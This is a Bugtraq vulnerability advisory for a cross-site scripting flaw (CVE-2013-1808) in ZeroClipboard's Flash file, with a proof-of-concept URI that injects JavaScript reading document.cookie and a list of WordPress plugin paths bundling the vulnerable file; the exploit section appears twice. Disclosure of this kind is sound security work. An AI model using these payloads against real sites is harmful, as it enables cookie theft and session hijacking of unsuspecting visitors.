ZeroClipboard 'ZeroClipboard10.swf' Cross Site Scripting Vulnerability
BID:58257
Info
ZeroClipboard 'ZeroClipboard10.swf' Cross Site Scripting Vulnerability
| Bugtraq ID: | 58257 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-1808 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 02 2013 12:00AM |
| Updated: | Mar 19 2015 09:18AM |
| Credit: | MustLive |
| Vulnerable: | |
| Not Vulnerable: | |
Exploit / POC
ZeroClipboard 'ZeroClipboard10.swf' Cross Site Scripting Vulnerability
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/wp-content/plugins/bp-code-snippets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/buckets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/click-to-copy-grab-box/lib/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/geshi-source-colorer/external/zeroclipboard/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/jaspreetchahals-coupons-lite/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/mobileview/admin/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-clone-by-wp-academy/lib/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/thethe-layout-grid/style/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/zopim-live-chat/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-link-to-us/js/ZeroClipboard.swf?id=[xss]
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://www.example.com/wp-content/plugins/bp-code-snippets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/buckets/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/click-to-copy-grab-box/lib/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/geshi-source-colorer/external/zeroclipboard/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/jaspreetchahals-coupons-lite/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/mobileview/admin/js/ZeroClipboard.swf?id=[XSS]
http://www.example.com/wp-content/plugins/paypal-digital-goods-monetization-powered-by-cleeng/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/slidedeck2/js/zeroclipboard/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-clone-by-wp-academy/lib/js/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/thethe-layout-grid/style/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/zopim-live-chat/ZeroClipboard.swf?id=[xss]
http://www.example.com/wp-content/plugins/wp-link-to-us/js/ZeroClipboard.swf?id=[xss]